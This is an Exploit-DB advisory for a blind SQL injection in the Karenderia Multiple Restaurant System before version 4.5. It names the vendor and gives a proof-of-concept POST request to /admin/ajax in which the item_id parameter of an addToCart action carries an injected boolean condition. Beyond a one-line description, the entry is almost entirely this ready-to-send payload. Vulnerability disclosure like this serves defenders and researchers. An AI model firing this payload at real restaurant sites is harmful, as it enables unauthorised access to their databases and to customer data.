Karenderia Multiple Restaurant System < 4.5 - Blind SQL Injection

EDB-ID: 44669
Author: telahdihapus
Published: 2018-05-21
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Google Dork: N/A 
# Date: 2018-05-10
# Exploit Author: telahdihapus
# Email Author: [email protected]
# Vendor Homepage: https://codecanyon.net/user/bastikikang
# Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Tested on: kali linux

# 1. description :
# When the user/attacker will add items to the cart, the attacker can intercept the data post, and add sql injection to the item_id parameter.

# 2. POC :
POST : /admin/ajax
host : http://victim.com/

action=addToCart&item_id=1' and '1'='1&row=&merchant_id=1&discount=&currentController=store&category_id=171&price=14.50&qty=2&notes=&require_addon_86=2&sub_item%5B86%5D%5B%5D=376%7C2%7CFried+Rice+%26+Fries%7C

Related Posts